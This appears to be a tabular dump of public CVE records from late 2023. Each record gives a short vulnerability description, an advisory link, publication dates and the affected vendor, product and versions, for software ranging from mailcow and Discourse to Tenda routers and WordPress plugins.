CVE-2023-49077 | Mailcow: dockerized is an open source groupware/email suite based on docker. A Cross-Site Scripting (XSS) vulnerability has been identified within the Quarantine UI of the system. This vulnerability poses a significant threat to administrators who utilize the Quarantine feature. An attacker can send a carefully crafted email containing malicious JavaScript code. This issue has been patched in version 2023-11. | https://github.com/mailcow/mailcow-dockerized/security/advisories/GHSA-46x4-w2fm-5x6g | 2023-11-21T18:57:30.427Z | 2023-11-30T07:14:04.580Z | 2023-11-30T07:14:04.580Z | {'Vendor': 'mailcow', 'Product': 'mailcow-dockerized', 'Versions': '< 2023-11'} |
CVE-2023-49098 | Discourse-reactions is a plugin that allows user to add their reactions to the post. Data about a user's reaction notifications could be exposed. This vulnerability was patched in commit 2c26939. | https://github.com/discourse/discourse-reactions/security/advisories/GHSA-mq82-7v5x-rhv8 | 2023-11-21T18:57:30.430Z | 2024-01-12T20:37:26.516Z | 2024-01-12T20:37:26.516Z | {'Vendor': 'discourse', 'Product': 'discourse-reactions', 'Versions': '< commit 2c26939'} |
CVE-2023-49132 | A vulnerability has been identified in Solid Edge SE2023 (All versions < V223.0 Update 10). The affected application is vulnerable to uninitialized pointer access while parsing specially crafted PAR files. An attacker could leverage this vulnerability to execute code in the context of the current process. | https://cert-portal.siemens.com/productcert/pdf/ssa-589891.pdf | 2023-11-22T14:53:05.160Z | 2024-01-09T10:00:07.440Z | 2024-01-09T10:00:07.440Z | {'Vendor': 'Siemens', 'Product': 'Solid Edge SE2023', 'Versions': 'All versions < V223.0 Update 10'} |
CVE-2023-49775 | Cross-Site Request Forgery (CSRF) vulnerability in Denis Kobozev CSV Importer.This issue affects CSV Importer: from n/a through 0.3.8.
| https://patchstack.com/database/vulnerability/csv-importer/wordpress-csv-importer-plugin-0-3-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | 2023-11-30T13:22:54.826Z | 2023-12-17T10:05:27.717Z | 2023-12-17T10:05:27.717Z | {'Vendor': 'Denis Kobozev', 'Product': 'CSV Importer', 'Versions': 'n/a'} |
CVE-2023-49260 | An XSS attack can be performed by changing the MOTD banner and pointing the victim to the "terminal_tool.cgi" path. It can be used together with the vulnerability CVE-2023-49255. | https://cert.pl/en/posts/2024/01/CVE-2023-49253/ | 2023-11-24T11:53:46.294Z | 2024-01-12T14:25:17.934Z | 2024-01-12T14:25:17.934Z | {'Vendor': 'Hongdian', 'Product': 'H8951-4G-ESP', 'Versions': '0'} |
CVE-2023-49149 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CurrencyRate.Today Currency Converter Calculator allows Stored XSS.This issue affects Currency Converter Calculator: from n/a through 1.3.1.
| https://patchstack.com/database/vulnerability/currency-converter-calculator/wordpress-currency-converter-calculator-plugin-1-3-1-cross-site-scripting-xss-vulnerability?_s_id=cve | 2023-11-22T23:35:38.289Z | 2023-12-14T17:01:13.100Z | 2023-12-14T17:01:13.100Z | {'Vendor': 'CurrencyRate.today', 'Product': 'Currency Converter Calculator', 'Versions': 'n/a'} |
CVE-2023-49722 | Network port 8899 open in WiFi firmware of BCC101/BCC102/BCC50 products, that allows an attacker to connect to the device via same WiFi network. | https://psirt.bosch.com/security-advisories/BOSCH-SA-473852.html | 2023-11-30T08:50:43.845Z | 2024-01-09T09:54:57.409Z | 2024-01-09T09:54:57.409Z | {'Vendor': 'Bosch', 'Product': 'BCC101', 'Versions': '4.13.20'} |
CVE-2023-49372 | JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/slide/save. | https://github.com/li-yu320/cms/blob/main/There%20is%20a%20CSRF%20present%20at%20the%20new%20location%20of%20the%20rotation%20image.md | 2023-11-27T00:00:00 | 2023-12-05T00:00:00 | 2023-12-05T14:26:40.286660 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49688 | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtUser' parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database.
| https://fluidattacks.com/advisories/pollini/ | 2023-11-29T17:48:17.255Z | 2023-12-21T23:21:04.511Z | 2023-12-21T23:21:04.511Z | {'Vendor': 'Kashipara Group', 'Product': 'Job Portal', 'Versions': '1.0'} |
CVE-2023-49237 | An issue was discovered on TRENDnet TV-IP1314PI 5.5.3 200714 devices. Command injection can occur because the system function is used by davinci to unpack language packs without strict filtering of URL strings. | https://drive.google.com/file/d/1lTloBkH_7zAz1ZbFVSZnfpoPd81aPaHx/view?usp=sharing | 2023-11-24T00:00:00 | 2024-01-09T00:00:00 | 2024-01-09T08:48:21.677572 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49958 | An issue was discovered in Dalmann OCPP.Core through 1.2.0 for OCPP (Open Charge Point Protocol) for electric vehicles. The server processes mishandle StartTransaction messages containing additional, arbitrary properties, or duplicate properties. The last occurrence of a duplicate property is accepted. This could be exploited to alter transaction records or impact system integrity. | https://github.com/dallmann-consulting/OCPP.Core/issues/36 | 2023-12-03T00:00:00 | 2023-12-07T00:00:00 | 2023-12-07T13:01:54.529118 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49734 | An authenticated Gamma user has the ability to create a dashboard and add charts to it, this user would automatically become one of the owners of the charts allowing him to incorrectly have write permissions to these charts.This issue affects Apache Superset: before 2.1.2, from 3.0.0 before 3.0.2.
Users are recommended to upgrade to version 3.0.2 or 2.1.3, which fixes the issue.
| https://lists.apache.org/thread/985h6ltvtbvdoysso780kkj7x744cds5 | 2023-11-30T12:29:59.894Z | 2023-12-19T09:52:13.373Z | 2023-12-19T09:52:13.373Z | {'Vendor': 'Apache Software Foundation', 'Product': 'Apache Superset', 'Versions': '0, 3.0.0'} |
CVE-2023-49558 | An issue in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the expand_mmac_params function in the modules/preprocs/nasm/nasm-pp.c component. | https://github.com/yasm/yasm/issues/252 | 2023-11-27T00:00:00 | 2024-01-02T00:00:00 | 2024-01-02T23:41:06.436238 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49108 | Path traversal vulnerability exists in RakRak Document Plus Ver.3.2.0.0 to Ver.6.4.0.7 (excluding Ver.6.1.1.3a). If this vulnerability is exploited, arbitrary files on the server may be obtained or deleted by a user of the product with specific privileges. | https://rakrak.jp/RakDocSupport/rkspServlet | 2023-11-22T04:24:31.707Z | 2023-12-04T05:08:29.398Z | 2023-12-04T05:08:29.398Z | {'Vendor': 'Sumitomo Electric Information Systems Co., Ltd.', 'Product': 'RakRak Document Plus', 'Versions': 'Ver.3.2.0.0 to Ver.6.4.0.7 (excluding Ver.6.1.1.3a)'} |
CVE-2023-49763 | Cross-Site Request Forgery (CSRF) vulnerability in Creatomatic Ltd CSprite.This issue affects CSprite: from n/a through 1.1.
| https://patchstack.com/database/vulnerability/csprite/wordpress-csprite-plugin-1-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | 2023-11-30T13:22:27.402Z | 2023-12-18T22:28:27.713Z | 2023-12-18T22:28:27.713Z | {'Vendor': 'Creatomatic Ltd', 'Product': 'CSprite', 'Versions': 'n/a'} |
CVE-2023-49299 | Improper Input Validation vulnerability in Apache DolphinScheduler. An authenticated user can cause arbitrary, unsandboxed javascript to be executed on the server.This issue affects Apache DolphinScheduler: until 3.1.9.
Users are recommended to upgrade to version 3.1.9, which fixes the issue.
| https://github.com/apache/dolphinscheduler/pull/15228 | 2023-11-26T10:03:26.679Z | 2023-12-30T16:27:12.045Z | 2023-12-30T16:30:17.905Z | {'Vendor': 'Apache Software Foundation', 'Product': 'Apache DolphinScheduler', 'Versions': '0'} |
CVE-2023-49276 | Uptime Kuma is an open source self-hosted monitoring tool. In affected versions the Google Analytics element in vulnerable to Attribute Injection leading to Cross-Site-Scripting (XSS). Since the custom status interface can set an independent Google Analytics ID and the template has not been sanitized, there is an attribute injection vulnerability here, which can lead to XSS attacks. This vulnerability has been addressed in commit `f28dccf4e` which is included in release version 1.23.7. Users are advised to upgrade. There are no known workarounds for this vulnerability. | https://github.com/louislam/uptime-kuma/security/advisories/GHSA-v4v2-8h88-65qj | 2023-11-24T16:45:24.311Z | 2023-12-01T22:05:41.789Z | 2023-12-01T22:05:41.789Z | {'Vendor': 'louislam', 'Product': 'uptime-kuma', 'Versions': '>= 1.20.0, < 1.23.7'} |
CVE-2023-49762 | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in AppMySite AppMySite – Create an app with the Best Mobile App Builder.This issue affects AppMySite – Create an app with the Best Mobile App Builder: from n/a through 3.11.0.
| https://patchstack.com/database/vulnerability/appmysite/wordpress-appmysite-create-an-app-with-the-best-mobile-app-builder-plugin-3-10-0-sensitive-data-exposure-vulnerability?_s_id=cve | 2023-11-30T13:22:27.402Z | 2023-12-21T13:09:02.488Z | 2023-12-21T13:09:02.488Z | {'Vendor': 'AppMySite', 'Product': 'AppMySite – Create an app with the Best Mobile App Builder', 'Versions': 'n/a'} |
CVE-2023-49298 | OpenZFS through 2.1.13 and 2.2.x through 2.2.1, in certain scenarios involving applications that try to rely on efficient copying of file data, can replace file contents with zero-valued bytes and thus potentially disable security mechanisms. NOTE: this issue is not always security related, but can be security related in realistic situations. A possible example is cp, from a recent GNU Core Utilities (coreutils) version, when attempting to preserve a rule set for denying unauthorized access. (One might use cp when configuring access control, such as with the /etc/hosts.deny file specified in the IBM Support reference.) NOTE: this issue occurs less often in version 2.2.1, and in versions before 2.1.4, because of the default configuration in those versions. | https://github.com/openzfs/zfs/pull/15571 | 2023-11-24T00:00:00 | 2023-11-24T00:00:00 | 2023-12-26T14:18:08.307339 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49277 | dpaste is an open source pastebin application written in Python using the Django framework. A security vulnerability has been identified in the expires parameter of the dpaste API, allowing for a POST Reflected XSS attack. This vulnerability can be exploited by an attacker to execute arbitrary JavaScript code in the context of a user's browser, potentially leading to unauthorized access, data theft, or other malicious activities. Users are strongly advised to upgrade to dpaste release v3.8 or later versions, as dpaste versions older than v3.8 are susceptible to the identified security vulnerability. No known workarounds have been identified, and applying the patch is the most effective way to remediate the vulnerability. | https://github.com/DarrenOfficial/dpaste/security/advisories/GHSA-r8j9-5cj7-cv39 | 2023-11-24T16:45:24.311Z | 2023-12-01T20:48:06.371Z | 2023-12-01T20:48:06.371Z | {'Vendor': 'DarrenOfficial', 'Product': 'dpaste', 'Versions': '< 3.8'} |
CVE-2023-49735 | ** UNSUPPORTED WHEN ASSIGNED **
The value set as the DefaultLocaleResolver.LOCALE_KEY attribute on the session was not validated while resolving XML definition files, leading to possible path traversal and eventually SSRF/XXE when passing user-controlled data to this key. Passing user-controlled data to this key may be relatively common, as it was also used like that to set the language in the 'tiles-test' application shipped with Tiles.
This issue affects Apache Tiles from version 2 onwards.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
| https://lists.apache.org/thread/8ktm4vxr6vvc1qsxh6ft8jzmom1zl65p | 2023-11-30T13:12:38.604Z | 2023-11-30T21:17:28.243Z | 2023-12-12T08:40:27.319Z | {'Vendor': 'Apache Software Foundation', 'Product': 'Apache Tiles', 'Versions': '2.0.0'} |
CVE-2023-49373 | JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) via /admin/slide/delete. | https://github.com/li-yu320/cms/blob/main/There%20is%20a%20CSRF%20at%20the%20deletion%20point%20of%20the%20broadcast%20image.md | 2023-11-27T00:00:00 | 2023-12-05T00:00:00 | 2023-12-05T14:26:01.720218 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49689 | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'JobId' parameter of the Employer/DeleteJob.php resource does not validate the characters received and they are sent unfiltered to the database.
| https://fluidattacks.com/advisories/pollini/ | 2023-11-29T17:48:17.255Z | 2023-12-21T23:26:34.521Z | 2023-12-21T23:26:34.521Z | {'Vendor': 'Kashipara Group', 'Product': 'Job Portal', 'Versions': '1.0'} |
CVE-2023-49666 | Billing Software v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'custmer_details' parameter of the submit_material_list.php resource does not validate the characters received and they are sent unfiltered to the database.
| https://fluidattacks.com/advisories/zimerman/ | 2023-11-28T21:52:11.044Z | 2024-01-04T14:02:16.288Z | 2024-01-04T14:02:16.288Z | {'Vendor': 'Kashipara Group', 'Product': 'Billing Software', 'Versions': '1.0'} |
CVE-2023-49236 | A stack-based buffer overflow was discovered on TRENDnet TV-IP1314PI 5.5.3 200714 devices, leading to arbitrary command execution. This occurs because of lack of length validation during an sscanf of a user-entered scale field in the RTSP playback function of davinci. | https://drive.google.com/file/d/1lTloBkH_7zAz1ZbFVSZnfpoPd81aPaHx/view?usp=sharing | 2023-11-24T00:00:00 | 2024-01-09T00:00:00 | 2024-01-09T08:48:19.993850 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49148 | Cross-Site Request Forgery (CSRF) vulnerability in Kulwant Nagi Affiliate Booster – Pros & Cons, Notice, and CTA Blocks for Affiliates.This issue affects Affiliate Booster – Pros & Cons, Notice, and CTA Blocks for Affiliates: from n/a through 3.0.5.
| https://patchstack.com/database/vulnerability/affiliatebooster-blocks/wordpress-affiliate-booster-plugin-3-0-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | 2023-11-22T23:35:38.289Z | 2023-12-18T22:08:11.992Z | 2023-12-18T22:08:11.992Z | {'Vendor': 'Kulwant Nagi', 'Product': 'Affiliate Booster – Pros & Cons, Notice, and CTA Blocks for Affiliates', 'Versions': 'n/a'} |
CVE-2023-49261 | The "tokenKey" value used in user authorization is visible in the HTML source of the login page. | https://cert.pl/en/posts/2024/01/CVE-2023-49253/ | 2023-11-24T11:53:46.295Z | 2024-01-12T14:25:26.606Z | 2024-01-12T14:25:26.606Z | {'Vendor': 'Hongdian', 'Product': 'H8951-4G-ESP', 'Versions': '0'} |
CVE-2023-49426 | Tenda AX12 V22.03.01.46 was discovered to contain a stack overflow via the list parameter at /goform/SetStaticRouteCfg. | https://github.com/ef4tless/vuln/blob/master/iot/AX12/SetStaticRouteCfg.md | 2023-11-27T00:00:00 | 2023-12-07T00:00:00 | 2023-12-07T14:51:30.071334 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49076 | Customer-data-framework allows management of customer data within Pimcore. There are no tokens or headers to prevent CSRF attacks from occurring, therefore an attacker could abuse this vulnerability to create new customers. This issue has been patched in version 4.0.5. | https://github.com/pimcore/customer-data-framework/security/advisories/GHSA-xx63-4jr8-9ghc | 2023-11-21T18:57:30.427Z | 2023-11-30T05:42:12.668Z | 2023-11-30T05:42:12.668Z | {'Vendor': 'pimcore', 'Product': 'customer-data-framework', 'Versions': '< 4.0.5'} |
CVE-2023-49563 | Cross Site Scripting (XSS) in Voltronic Power SNMP Web Pro v.1.1 allows an attacker to execute arbitrary code via a crafted script within a request to the webserver. | https://gist.github.com/ph4nt0mbyt3/b237bfb06b2bff405ab47e4ea52c0bd2 | 2023-11-27T00:00:00 | 2023-12-12T00:00:00 | 2023-12-12T08:17:00.543958 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49099 | Discourse is a platform for community discussion. Under very specific circumstances, secure upload URLs associated with posts can be accessed by guest users even when login is required. This vulnerability has been patched in 3.2.0.beta4 and 3.1.4. | https://github.com/discourse/discourse/security/advisories/GHSA-j67x-x6mq-pwv4 | 2023-11-21T18:57:30.430Z | 2024-01-12T20:53:53.163Z | 2024-01-12T20:53:53.163Z | {'Vendor': 'discourse', 'Product': 'discourse', 'Versions': '< 3.1.4, >= 3.2.0beta1, < 3.2.0.beta4'} |
CVE-2023-49830 | Improper Control of Generation of Code ('Code Injection') vulnerability in Brainstorm Force Astra Pro.This issue affects Astra Pro: from n/a through 4.3.1.
| https://patchstack.com/database/vulnerability/astra-addon/wordpress-astra-pro-plugin-4-3-1-contributor-remote-code-execution-rce-vulnerability?_s_id=cve | 2023-11-30T15:27:45.875Z | 2023-12-29T09:13:42.503Z | 2023-12-29T09:13:42.503Z | {'Vendor': 'Brainstorm Force', 'Product': 'Astra Pro', 'Versions': 'n/a'} |
CVE-2023-49471 | Blind Server-Side Request Forgery (SSRF) vulnerability in karlomikus Bar Assistant before version 3.2.0 does not validate a parameter before making a request through Image::make(), which could allow authenticated remote attackers to execute arbitrary code. | https://github.com/zunak/CVE-2023-49471 | 2023-11-27T00:00:00 | 2024-01-10T00:00:00 | 2024-01-10T08:57:20.302089 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49922 | An issue was discovered by Elastic whereby Beats and Elastic Agent would log a raw event in its own logs at the WARN or ERROR level if ingesting that event to Elasticsearch failed with any 4xx HTTP status code except 409 or 429. Depending on the nature of the event that Beats or Elastic Agent attempted to ingest, this could lead to the insertion of sensitive or private information in the Beats or Elastic Agent logs. Elastic has released 8.11.3 and 7.17.16 that prevents this issue by limiting these types of logs to DEBUG level logging, which is disabled by default. | https://discuss.elastic.co/t/beats-and-elastic-agent-8-11-3-7-17-16-security-update-esa-2023-30/349180 | 2023-12-02T16:06:57.310Z | 2023-12-12T18:23:20.438Z | 2023-12-12T18:23:32.489Z | {'Vendor': 'Elastic', 'Product': 'Beats', 'Versions': '7.0.0, 8.0.0'} |
CVE-2023-49164 | Cross-Site Request Forgery (CSRF) vulnerability in OceanWP Ocean Extra.This issue affects Ocean Extra: from n/a through 2.2.2.
| https://patchstack.com/database/vulnerability/ocean-extra/wordpress-ocean-extra-plugin-2-2-2-csrf-leading-to-arbitrary-plugin-activation-vulnerability?_s_id=cve | 2023-11-22T23:36:04.378Z | 2023-12-19T21:41:51.146Z | 2023-12-19T21:41:51.146Z | {'Vendor': 'OceanWP', 'Product': 'Ocean Extra', 'Versions': 'n/a'} |
CVE-2023-49934 | An issue was discovered in SchedMD Slurm 23.11.x. There is SQL Injection against the SlurmDBD database. The fixed version is 23.11.1. | https://www.schedmd.com/security-archive.php | 2023-12-03T00:00:00 | 2023-12-14T00:00:00 | 2024-01-03T03:06:29.065825 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49467 | Libde265 v1.0.14 was discovered to contain a heap-buffer-overflow vulnerability in the derive_combined_bipredictive_merging_candidates function at motion.cc. | https://github.com/strukturag/libde265/issues/434 | 2023-11-27T00:00:00 | 2023-12-07T00:00:00 | 2023-12-30T21:06:26.858480 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49172 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BrainCert BrainCert – HTML5 Virtual Classroom allows Reflected XSS.This issue affects BrainCert – HTML5 Virtual Classroom: from n/a through 1.30.
| https://patchstack.com/database/vulnerability/html5-virtual-classroom/wordpress-braincert-html5-virtual-classroom-plugin-1-30-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | 2023-11-22T23:36:21.489Z | 2023-12-14T15:31:03.476Z | 2023-12-14T15:31:03.476Z | {'Vendor': 'BrainCert', 'Product': 'BrainCert – HTML5 Virtual Classroom', 'Versions': 'n/a'} |
CVE-2023-49488 | A cross-site scripting (XSS) vulnerability in Openfiler ESA v2.99.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the nic parameter. | https://github.com/Hebing123/cve/issues/1 | 2023-11-27T00:00:00 | 2023-12-11T00:00:00 | 2023-12-11T21:07:57.574479 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49060 | An attacker could have accessed internal pages or data by ex-filtrating a security key from ReaderMode via the `referrerpolicy` attribute. This vulnerability affects Firefox for iOS < 120. | https://bugzilla.mozilla.org/show_bug.cgi?id=1861405 | 2023-11-20T15:00:28.168Z | 2023-11-21T14:28:55.428Z | 2023-11-21T14:28:55.428Z | {'Vendor': 'Mozilla', 'Product': 'Firefox for iOS', 'Versions': 'unspecified'} |
CVE-2023-49430 | Tenda AX9 V22.03.01.46 has been found to contain a stack overflow vulnerability in the 'list' parameter at /goform/SetStaticRouteCfg. | https://github.com/ef4tless/vuln/blob/master/iot/AX9/SetStaticRouteCfg.md | 2023-11-27T00:00:00 | 2023-12-07T00:00:00 | 2023-12-07T15:33:48.262946 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49826 | Deserialization of Untrusted Data vulnerability in PenciDesign Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme.This issue affects Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme: from n/a through 8.4.1.
| https://patchstack.com/database/vulnerability/soledad/wordpress-soledad-theme-8-4-1-unauthenticated-php-object-injection-vulnerability?_s_id=cve | 2023-11-30T15:27:45.874Z | 2023-12-21T12:34:51.957Z | 2023-12-21T12:34:51.957Z | {'Vendor': 'PenciDesign', 'Product': 'Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme', 'Versions': 'n/a'} |
CVE-2023-49294 | Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue. | https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f | 2023-11-24T16:45:24.314Z | 2023-12-14T19:40:46.157Z | 2023-12-14T19:40:46.157Z | {'Vendor': 'asterisk', 'Product': 'asterisk', 'Versions': '< 18.20.1, >= 19.0.0, < 20.5.1, = 21.0.0, < 18.9-cert6'} |
CVE-2023-49152 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Labs64 Credit Tracker allows Stored XSS.This issue affects Credit Tracker: from n/a through 1.1.17.
| https://patchstack.com/database/vulnerability/credit-tracker/wordpress-credit-tracker-plugin-1-1-17-cross-site-scripting-xss-vulnerability?_s_id=cve | 2023-11-22T23:35:38.290Z | 2023-12-14T17:13:34.175Z | 2023-12-14T17:13:34.175Z | {'Vendor': 'Labs64', 'Product': 'Credit Tracker', 'Versions': 'n/a'} |
CVE-2023-49914 | InteraXon Muse 2 devices allow remote attackers to cause a denial of service (incorrect Muse App report of an outstanding, calm meditation state) via a 480 MHz RF carrier that is modulated by a "false" brain wave, aka a Brain-Hack attack. For example, the Muse App does not display the reception of a strong RF carrier, and alert the user that a report may be misleading if this carrier has been modulated by a low-frequency signal. | https://dl.acm.org/doi/10.1145/3605758.3623497 | 2023-12-02T00:00:00 | 2023-12-02T00:00:00 | 2023-12-02T00:19:13.494365 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49447 | JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/nav/update. | https://github.com/ysuzhangbin/cms/blob/main/CSRF%20exists%20at%20the%20navigation%20management%20modification%20location.md | 2023-11-27T00:00:00 | 2023-12-05T00:00:00 | 2023-12-05T15:00:01.699003 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.